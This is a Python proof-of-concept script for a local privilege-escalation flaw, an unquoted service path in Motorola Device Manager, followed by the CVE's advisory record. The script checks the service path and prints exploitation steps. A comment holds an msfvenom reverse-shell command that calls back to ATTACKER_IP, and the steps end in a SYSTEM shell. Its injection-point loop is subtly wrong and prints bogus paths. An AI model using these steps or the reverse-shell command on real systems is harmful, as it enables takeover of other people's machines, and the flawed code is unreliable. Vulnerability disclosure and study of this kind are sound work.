CVE-2020-36981

# CVE-2020-36981 - Motorola Device Manager Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in ForwardDaemon.exe # Attack prerequisite: Local user access with low privileges import os import subprocess import ctypes def check_vulnerability(): """Check if the target service is vulnerable to unquoted path""" service_name = "PST Service" try: # Query service configuration using sc command result = subprocess.run( ["sc", "qc", service_name], capture_output=True, text=True ) if "BINARY_PATH_NAME" in result.stdout: print("[*] Service found, checking binary path...") for line in result.stdout.split('\n'): if "BINARY_PATH_NAME" in line: path = line.split(":", 1)[1].strip() print(f"[*] Current path: {path}") # Check if path is unquoted if '"' not in path: print("[!] VULNERABLE: Path is not quoted!") return True else: print("[-] SAFE: Path is properly quoted") return False except Exception as e: print(f"[-] Error: {e}") return False def exploit_unquoted_path(): """ Exploitation steps: 1. Identify the unquoted path: C:\Program Files\Motorola Device Manager\ForwardDaemon.exe 2. Create malicious executable named 'Program.exe' in C:\ 3. Wait for service restart or reboot 4. Malicious code executes with SYSTEM privileges """ vulnerable_path = "C:\\Program Files\\Motorola Device Manager\\ForwardDaemon.exe" # Extract potential injection points parts = vulnerable_path.split('\\') print("[*] Potential injection points:") current_path = "" for i, part in enumerate(parts[:-1]): current_path += part + "\\" if ' ' in part and '"' not in vulnerable_path: print(f"[+] {current_path}{part}.exe") # Generate reverse shell payload # msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > Program.exe print("\n[!] Exploitation requires:") print("1. Create malicious executable at injection point") print("2. Wait for service restart or trigger manually: sc stop 'PST Service' && sc start 'PST Service'") print("3. Receive SYSTEM shell on attacker machine") if __name__ == "__main__": print("=== CVE-2020-36981 PoC ===") check_vulnerability() exploit_unquoted_path()

{"cve": {"id": "CVE-2020-36981", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:11.117", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Motorola Device Manager 2.4.5 contains an unquoted service path vulnerability in the PST Service that allows local users to potentially execute arbitrary code. Attackers can exploit the unquoted path in ForwardDaemon.exe to inject malicious code that will execute with elevated system privileges during service startup."}, {"lang": "es", "value": "Motorola Device Manager 2.4.5 contiene una vulnerabilidad de ruta de servicio sin comillas en el Servicio PST que permite a usuarios locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en ForwardDaemon.exe para inyectar código malicioso que se ejecutará con privilegios de sistema elevados durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49011", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49013", "source": "[email protected]"}, {"url": "https://www.filehorse.com/es/descargar-motorola-device-manager/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/motorola-device-manager-forwarddaemonexe-unquoted-service-path", "source": "[email protected]"}]}}